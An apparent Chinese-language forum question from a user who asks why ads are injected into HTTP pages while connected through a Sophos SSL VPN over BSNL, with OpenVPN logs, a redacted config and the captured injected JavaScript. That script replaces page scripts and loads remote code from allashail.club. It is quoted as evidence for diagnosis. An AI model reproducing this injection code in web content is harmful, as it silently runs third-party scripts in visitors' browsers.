我正在使用 Sophos SSL VPN 客户端。但我使用的是 BSNL ISP。每当我连接我的 VPN 并浏览任何 HTTP 非安全网站时,ADS 都会被注入到 JS 脚本文件中。但是当我断开 VPN 并浏览任何不安全的网站时。不会发生脚本注入,也不会显示 ADS
但我的问题是,我的 ISP BSNL 在连接到安全隧道后如何识别出我正在浏览一个不安全的网站。这样所有路由的网络流量都将被加密。但是他们如何使用 Network Proxy Analyzer 来注入脚本呢?
在这里您将找到连接到 VPN 时的日志
OpenVPN 2.3.8 i686-w64-mingw32 [SSL (OpenSSL)] [LZO] [IPv6] built on Jul 3 2017
library versions: OpenSSL 1.0.2l 25 May 2017, LZO 2.09
Data Channel Encrypt: Cipher 'AES-128-CBC' initialized with 128 bit key
Data Channel Encrypt: Using 256 bit message hash 'SHA256' for HMAC authentication
Data Channel Decrypt: Cipher 'AES-128-CBC' initialized with 128 bit key
Data Channel Decrypt: Using 256 bit message hash 'SHA256' for HMAC authentication
Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA, 2048 bit RSA
脚本(JS)
!function() {
var a = "/analytics.js"
, r = null
, e = document.getElementsByTagName("script")
, i = e.length
, n = null
, t = Date.now()
, s = null
, o = 0;
for ("/" === a.substring(0, 1) && (a = a.substring(1)),
o = 0; o < i; o += 1)
if (void 0 !== e[o].src && null !== e[o].src && e[o].src.indexOf(a) > -1) {
n = o,
r = e[o];
break
}
void 0 !== r && null !== r || (r = document.getElementsByTagName("script")[0]),
s = r.src.indexOf("?") > -1 ? r.src + "&cb=" + t.toString() + "&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag" : r.src + "?cb=" + t.toString() + "&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag";
try {
if (void 0 === window.sarazasarazaNoti || null === window.sarazasarazaNoti || window.sarazasarazaNoti === Array && window.sarazasarazaNoti.indexOf(r.src) < 0) {
void 0 !== window.sarazasarazaNoti && null !== window.sarazasarazaNoti || (window.sarazasarazaNoti = new Array),
window.sarazasarazaNoti.push(r.src);
var c = r.parentNode
, d = r;
if (r.async || r.defer || null !== n && n !== e.length - 1) {
var w = document.createElement("script");
w.src = s,
c.replaceChild(w, d)
} else
document.write("<script type='text/javascript' src=" + s + "><\/script>"),
c.removeChild(d)
}
} catch (a) {}
}();
document.addEventListener('DOMContentLoaded', function() {
var esp = document.createElement('span');
var esr = document.createElement('script');
esr.src = 'http://allashail.club/rNUma4ZKIVZiq/7257?ndn=ch2';
esr.type = 'text/javascript';
esp.appendChild(esr);
document.body.appendChild(esp);
}, false);
HTML(脚本注入)
<html>
<head>
<script src="http://www.google-analytics.com/analytics.js?cb=1585885601053&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag"></script>
</head>
</body>
<span>
<script src="http://allashail.club/rNUma4ZKIVZiq/7257?ndn=ch2" type="text/javascript"></script>
</span>
</body>
</html>
OpenVPN 配置
client
dev tun
proto tcp
verify-x509-name "OU=Domain Control Validated, CN=*.domain.com"
route remote_host 255.255.255.255 net_gateway
resolv-retry infinite
nobind
persist-key
persist-tun
<ca>
Bag Attributes: <No Attributes>
subject=/C=BE/O=GlobalSign nv-sa/CN=XXXSSL CA - SHA256 - G2
issuer=/C=BE/O=GlobalSign nv-sa/OU=Root CA/CN=GlobalSign Root CA
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
</ca>
<cert>
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
</cert>
<key>
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
</key>
auth-user-pass pass.txt
cipher AES-128-CBC
auth SHA256
comp-lzo no
route-delay 4
verb 3
reneg-sec 86400
remote xxx.xx.xxx.xx 8443
remote xxx.xx.xxx.xx 8443
remote xxx.xx.xxx.xx 8443
remote xxx.xxx.xxx.xx 8443
remote xxx.xxx.xxx.xx 8443
建立安全连接。我们应该如何使用 OpenVPN 协议配置我的 Sophos SSL VPN 客户端